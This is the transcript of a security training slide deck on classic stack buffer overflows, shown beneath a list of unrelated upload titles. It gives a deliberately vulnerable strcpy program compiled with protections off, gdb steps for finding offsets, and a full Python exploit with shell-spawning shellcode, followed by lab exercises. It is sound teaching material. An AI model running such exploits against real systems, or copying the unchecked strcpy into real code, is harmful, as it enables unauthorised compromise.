Strategies of Urban Morphologyfor Improving Outdoor Thermal Comfort and Susta...Strategies of Urban Morphologyfor Improving Outdoor Thermal Comfort and Susta...
Strategies of Urban Morphologyfor Improving Outdoor Thermal Comfort and Susta...amrabdallah9
 
Lecture 1: Basics of trigonometry (surveying)
Lecture 1: Basics of trigonometry (surveying)Lecture 1: Basics of trigonometry (surveying)
Lecture 1: Basics of trigonometry (surveying)Bahzad5
 
Introduction to Machine Learning Unit-3 for II MECH
Introduction to Machine Learning Unit-3 for II MECHIntroduction to Machine Learning Unit-3 for II MECH
Introduction to Machine Learning Unit-3 for II MECHC Sai Kiran
 
Oracle_PLSQL_basic_tutorial_with_workon_Exercises.ppt
Oracle_PLSQL_basic_tutorial_with_workon_Exercises.pptOracle_PLSQL_basic_tutorial_with_workon_Exercises.ppt
Oracle_PLSQL_basic_tutorial_with_workon_Exercises.pptDheerajKashnyal
 
specification estimation and valuation of a building
specification estimation and valuation of a buildingspecification estimation and valuation of a building
specification estimation and valuation of a buildingswethasekhar5
 

Recently uploaded (20)

SATELITE COMMUNICATION UNIT 1 CEC352 REGULATION 2021 PPT BASICS OF SATELITE ....
SATELITE COMMUNICATION UNIT 1 CEC352 REGULATION 2021 PPT BASICS OF SATELITE ....SATELITE COMMUNICATION UNIT 1 CEC352 REGULATION 2021 PPT BASICS OF SATELITE ....
SATELITE COMMUNICATION UNIT 1 CEC352 REGULATION 2021 PPT BASICS OF SATELITE ....
 
Power System electrical and electronics .pptx
Power System electrical and electronics .pptxPower System electrical and electronics .pptx
Power System electrical and electronics .pptx
 
Gender Bias in Engineer, Honors 203 Project
Gender Bias in Engineer, Honors 203 ProjectGender Bias in Engineer, Honors 203 Project
Gender Bias in Engineer, Honors 203 Project
 
Guardians and Glitches: Navigating the Duality of Gen AI in AppSec
Guardians and Glitches: Navigating the Duality of Gen AI in AppSecGuardians and Glitches: Navigating the Duality of Gen AI in AppSec
Guardians and Glitches: Navigating the Duality of Gen AI in AppSec
 
計劃趕得上變化
計劃趕得上變化計劃趕得上變化
計劃趕得上變化
 
SUMMER TRAINING REPORT ON BUILDING CONSTRUCTION.docx
SUMMER TRAINING REPORT ON BUILDING CONSTRUCTION.docxSUMMER TRAINING REPORT ON BUILDING CONSTRUCTION.docx
SUMMER TRAINING REPORT ON BUILDING CONSTRUCTION.docx
 
cme397 surface engineering unit 5 part A questions and answers
cme397 surface engineering unit 5 part A questions and answerscme397 surface engineering unit 5 part A questions and answers
cme397 surface engineering unit 5 part A questions and answers
 
sdfsadopkjpiosufoiasdoifjasldkjfl a asldkjflaskdjflkjsdsdf
sdfsadopkjpiosufoiasdoifjasldkjfl a asldkjflaskdjflkjsdsdfsdfsadopkjpiosufoiasdoifjasldkjfl a asldkjflaskdjflkjsdsdf
sdfsadopkjpiosufoiasdoifjasldkjfl a asldkjflaskdjflkjsdsdf
 
Litature Review: Research Paper work for Engineering
Litature Review: Research Paper work for EngineeringLitature Review: Research Paper work for Engineering
Litature Review: Research Paper work for Engineering
 
Phase noise transfer functions.pptx
Phase noise transfer      functions.pptxPhase noise transfer      functions.pptx
Phase noise transfer functions.pptx
 
cloud computing notes for anna university syllabus
cloud computing notes for anna university syllabuscloud computing notes for anna university syllabus
cloud computing notes for anna university syllabus
 
Design Analysis of Alogorithm 1 ppt 2024.pptx
Design Analysis of Alogorithm 1 ppt 2024.pptxDesign Analysis of Alogorithm 1 ppt 2024.pptx
Design Analysis of Alogorithm 1 ppt 2024.pptx
 
Mohs Scale of Hardness, Hardness Scale.pptx
Mohs Scale of Hardness, Hardness Scale.pptxMohs Scale of Hardness, Hardness Scale.pptx
Mohs Scale of Hardness, Hardness Scale.pptx
 
Strategies of Urban Morphologyfor Improving Outdoor Thermal Comfort and Susta...
Strategies of Urban Morphologyfor Improving Outdoor Thermal Comfort and Susta...Strategies of Urban Morphologyfor Improving Outdoor Thermal Comfort and Susta...
Strategies of Urban Morphologyfor Improving Outdoor Thermal Comfort and Susta...
 
Lecture 1: Basics of trigonometry (surveying)
Lecture 1: Basics of trigonometry (surveying)Lecture 1: Basics of trigonometry (surveying)
Lecture 1: Basics of trigonometry (surveying)
 
Introduction to Machine Learning Unit-3 for II MECH
Introduction to Machine Learning Unit-3 for II MECHIntroduction to Machine Learning Unit-3 for II MECH
Introduction to Machine Learning Unit-3 for II MECH
 
Oracle_PLSQL_basic_tutorial_with_workon_Exercises.ppt
Oracle_PLSQL_basic_tutorial_with_workon_Exercises.pptOracle_PLSQL_basic_tutorial_with_workon_Exercises.ppt
Oracle_PLSQL_basic_tutorial_with_workon_Exercises.ppt
 
specification estimation and valuation of a building
specification estimation and valuation of a buildingspecification estimation and valuation of a building
specification estimation and valuation of a building
 
Présentation IIRB 2024 Chloe Dufrane.pdf
Présentation IIRB 2024 Chloe Dufrane.pdfPrésentation IIRB 2024 Chloe Dufrane.pdf
Présentation IIRB 2024 Chloe Dufrane.pdf
 
Lecture 2 .pdf
Lecture 2                           .pdfLecture 2                           .pdf
Lecture 2 .pdf
 

03 - Refresher on buffer overflow in the old days

  • 1. Thank you Aleph One! Refresher on buffer overflow in the old days Alex Moneger Security Engineer
  • 2. Buffer overflow refresher  First paper by Aleph One in 1996 in Phrack #49: http://www.phrack.org/issues.html?issue=49&id=14  No OS level protections at the time  Works by writing past the buffer end aka stuff more data into a buffer then it can hold  Goal is to overwrite something interesting control structure with our attacker data. Can de saved EIP, but can be any function pointer © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 2
  • 3. Stack refresher (again ;))  Stack holds local variables, the address of the previous frame, the address of where to return to  Goal is to overwrite Saved EIP (referred to as SEIP)  If we control SEIP, we control where “ret” instruction will go, meaning we control EIP SEIP SEBP Local function storage © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 3
  • 4. The “classic” cisco@kali:~/src/seccon/ch3$ pygmentize -g ch3.c #include <string.h> int vuln(char *stuff) { char buf[0x64] = {0}; strcpy(buf, stuff); return 1; } int main(int argc, char **argv) { vuln(argv[1]); return 0; }  “Buf” has no boundary checking. “stuff” is attacker controlled SEIP SEBP Buf © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 4
  • 5. Making it exploitable  Previous program compiled with following options: cisco@kali:~/src/seccon/ch3$ sudo sysctl -a | grep randomize kernel.randomize_va_space = 0 cisco@kali:~/src/seccon/ch3$ cc ch3.c -fno-stack-protector -z execstack -U_FORTIFY_SOURCE –g -o ch3  See how many security features we are disabling?  Pretend we don’t have sources, find the size of the local stack storage in function prologue cisco@kali:~/src/seccon/ch3$ objdump -d -j .text -M intel ch3 | grep -i 'vuln>:' -A 10 | grep --color esp 804841d: 89 e5 mov ebp,esp 8048421: 83 c4 80 add esp,0xffffff80 cisco@kali:~/src/seccon/ch3$ python -c 'import exutil as e; print e.cmp2(0xffffff80)' -128 © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 5
  • 6. Recon  Local storage for func is 128 bytes. Nothing says that our vulnerable buf starts at the beginning of that  Let’s figure out how much we need to overwrite to control EIP  Max overwrite size = ebp – esp + SEBP + SEIP = 128 + 4 + 4 = 136 SEIP SEBP ???? Buf ???? 1 2 8 © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 6
  • 7. Finding the offsets manually cisco@kali:~/src/seccon/ch3$ python -c 'print "A =>", hex(ord("A")), "B =>", hex(ord("B"))' A => 0x41 B => 0x42 cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*132+"B"*4')) || dmesg | tail -n 1 Segmentation fault [613635.624345] ch3[18312]: segfault at 41414141 ip 41414141 sp bffffcf0 error 14 cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*128+"B"*4')) || dmesg | tail -n 1 Segmentation fault [613642.976497] ch3[18318]: segfault at 41414141 ip 41414141 sp bffffcf0 error 14 cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*124+"B"*4')) || dmesg | tail -n 1 Segmentation fault [613663.605595] ch3[18325]: segfault at 41414141 ip 41414141 sp bffffcf0 error 14 cisco@kali:~/src/seccon/ch3$ # Continue decrementing by 4 cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*112+"B"*4')) || dmesg | tail -n 1 Segmentation fault [613678.429167] ch3[18331]: segfault at 42424242 ip 42424242 sp bffffd00 error 14  Doing this properly => Use msf pattern_create.rb & pattern_offset.rb © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 7
  • 8. We’re going to overflow!!! 1. Choose a shellcode 2. Compute it’s length: ie: 40 bytes 3. Add the proper padding to overwrite SEIP: 112 - 40 = 72 4. Find the address of our shellcode 5. Append to the buffer to redirect flow Shellcode Junk SC Add ress © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 8
  • 9. Finding buffer address cisco@kali:~/src/seccon/ch3$ env -i gdb --quiet --args ./ch3 $(python -c 'print "A"*112+"BCDE"') Reading symbols from /home/cisco/src/seccon/ch3/ch3...done. gdb$ gdb$ !objdump -d -j .text -M intel ch3 | grep -i 'vuln>:' -A 22 | tail -n 5 804844e: 83 ec 80 sub esp,0xffffff80 8048451: 5b pop ebx 8048452: 5f pop edi 8048453: 5d pop ebp 8048454: c3 ret gdb$ gdb$ break *0x804844e Breakpoint 1 at 0x804844e: file ch3.c, line 9. gdb$ r gdb$ x/16w $esp 0xbffffc70: 0xbffffc8c 0xbffffec9 0xb7ffeff4 0xbffffd70 0xbffffc80: 0xb7fffac0 0xbffffd44 0xb7feb662 0x41414141 0xbffffc90: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffffca0: 0x41414141 0x41414141 0x41414141 0x41414141 gdb$ x/x 0xbffffc8c 0xbffffc8c: 0x41414141 gdb$ x/s 0xbffffc8c 0xbffffc8c: 'A' <repeats 112 times>, "BBBB" gdb$ x/2w $ebp 0xbffffcf8: 0x41414141 0x42424242 gdb$ si 5 --------------------------------------------------------------------------[regs] EAX: 00000001 EBX: 41414141 ECX: 00000000 EDX: 00000075 o d I t S z a P C ESI: 00000000 EDI: 41414141 EBP: 41414141 ESP: BFFFFD00 EIP: 42424242 CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007BError while running hook_stop: Cannot access memory at address 0x42424242 0x42424242 in ?? () © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 9
  • 10. Summary  We have the overflow length: 116 bytes (112 bytes + 4 bytes SEIP overwrite)  We have the buffer’s address (0xbffffc8c)  We have a shellcode (I’m a nice guy)  Stuff all of it together © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 10
  • 11. Shell time cisco@kali:~/src/seccon/ch3$ pygmentize ch3.py #!/usr/bin/env python # -*- coding: utf-8 -*- import os import struct target = "ch3" overflow_len = 112 ret_addr = 0xbffffc8c target_path = os.path.abspath(target) # setreuid(geteuid(),geteuid()); execve("/bin/sh",0,0) sc = ("x6ax31x58x99xcdx80x89xc3x89xc1x6ax46" "x58xcdx80xb0x0bx52x68x6ex2fx73x68x68" "x2fx2fx62x69x89xe3x89xd1xcdx80") nop_sled = overflow_len - len(sc) sc_addr = struct.pack("<I", ret_addr) ex = "%s%s%s" % (sc, 'A'*nop_sled, sc_addr) os.execve(target_path, (target_path, ex), os.environ) © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 11
  • 12. Result cisco@kali:~/src/seccon/ch3$ invoke ch3.py $ id uid=1000(cisco) gid=1001(cisco) groups=1001(cisco) $ exit cisco@kali:~/src/seccon/ch3$ © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 12
  • 13. Variations  Small buffers (shellcode doesn’t fit): append shellcode after ret address SC Add ress Junk Shellcode  Unpredictable buffer address (stack size is not under control): append NOP sled in front of shellcode: NOP sled Shellcode SC Add ress  Use an environment variable to host your shellcode © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 13
  • 14. Limitations  Shellcode on executed on the stack, so stack needs to be executable  Buffer address is known, so addresses can’t be randomized  Stack frame is not protected (more on this later)  There are no null bytes in our buffer address (This can fixed easily) © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 14
  • 15. Now get to work  Compile and exploit ch3  Try any different exploitation technique described previously  Don’t use the “invoke” script when trying to exploit. What is happening to the stack? Why is your exploit failing?  Enable one memory protection (whichever). Check the effect on the exploit © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 15